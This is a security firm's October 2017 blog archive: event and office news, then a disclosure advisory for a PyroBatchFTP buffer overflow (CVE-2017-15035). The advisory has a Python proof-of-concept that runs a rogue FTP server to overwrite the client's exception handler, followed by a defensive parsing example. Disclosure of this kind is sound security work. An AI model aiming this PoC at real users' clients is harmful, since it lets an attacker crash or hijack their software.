Archives for October 2017

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public consciousness. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising number of breaches.

Breaches happen to all types of organisation, regardless of size or industry, and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implications of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.

Office Move and Expansion

The past few weeks have been a busy period for the team at 7 Elements. Behind the scenes, we have recently moved our Scotland office to the Oracle Campus in Linlithgow and extended our UK-wide coverage by establishing a 7E presence within London.

Scotland

Our Scotland-based team will still be the primary point of contact for all engagements, and the new office details can be found here.

London

Our expansion into London is in partnership with Scottish Enterprise and the Scottish Government, with 7 Elements using the prestigious Scotland House as our London base. We are working on some exciting events that we will be hosting at Scotland House, so watch this space for future news and invitations.

Further reading from ScotSoft 2017

Following David’s presentation “Breaking Bad – Season Two” at ScotSoft 2017, this post contains the remediation advice and further reading notes on the matters presented.


CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product: PyroBatchFTP
Version: 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. The overflow occurs after the client successfully connects to an FTP server that returns a current directory string longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack the execution flow of the application.

PoC

The following proof-of-concept Python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyroBatchFTP will trigger the buffer overflow.


#!/usr/bin/python3

print("Pyro FTP Buffer Overflow (SEH) Server")

# Author: Kevin McGuigan
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.emtech.com

import socket
import sys

# Overlong current directory string returned to the connecting client
buffer = b"A" * 2292 + b"B" * 4 + b"C" * 4 + b"D" * 800
port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    print("[+] FTP server started on port: " + str(port) + "\r\n")
except OSError:
    print("[+] Failed to bind the server to port:" + str(port) + "\r\n")
    sys.exit(1)  # nothing to accept on if the bind failed

while True:
    conn, addr = s.accept()
    # Banner, then accept whatever USER/PASS the client sends
    conn.send(b'220 Welcome to PyoBatchFTP Overflow!\r\n')
    print(conn.recv(1024))
    conn.send(b"331 OK\r\n")
    print(conn.recv(1024))
    conn.send(b'230 OK\r\n')
    print(conn.recv(1024))
    # Reply carrying the overlong quoted directory string
    conn.send(b'220 "' + buffer + b'" is current directory\r\n')

[Figure: SEH Overwrite]

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.
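For developers of FTP clients, the sketch below shows the kind of bounds-checked parsing that prevents this class of bug. It is an added example, not Emtec's patch and not code from this advisory; the function names and the 260-byte `MAX_DIR` limit are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define MAX_DIR 260 /* assumed client-side path limit (hypothetical) */

/* Extract the quoted path from an FTP reply such as
 *   257 "/pub/files" is current directory
 * into out[out_len]. A doubled quote ("") inside the path is one literal
 * quote (RFC 959). Returns the path length, -1 if the reply is malformed,
 * or -2 if the path does not fit; on failure out is an empty string. */
int parse_quoted_dir(const char *reply, char *out, size_t out_len)
{
    const char *p;
    size_t n = 0;

    if (out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';
    if (reply == NULL || (p = strchr(reply, '"')) == NULL)
        return -1;
    for (p++; ; p++) {
        if (*p == '\0' || *p == '\r' || *p == '\n') {
            out[0] = '\0';
            return -1;              /* no closing quote */
        }
        if (*p == '"') {
            if (p[1] != '"')
                break;              /* closing quote */
            p++;                    /* doubled quote: keep one */
        }
        if (n + 1 >= out_len) {
            out[0] = '\0';
            return -2;              /* reject: never overflow or truncate */
        }
        out[n++] = *p;
    }
    out[n] = '\0';
    return (int)n;
}

/* Constructed input: a reply shaped like the PoC's, with a 3100-byte path. */
int overlong_reply_result(void)
{
    static char reply[3200];
    char dir[MAX_DIR];
    size_t off = strlen(strcpy(reply, "220 \""));

    memset(reply + off, 'A', 3100);
    strcpy(reply + off + 3100, "\" is current directory\r\n");
    return parse_quoted_dir(reply, dir, sizeof dir);
}
```

Rejecting the reply outright, rather than truncating it, keeps the client from acting on a path the server never actually sent.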

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017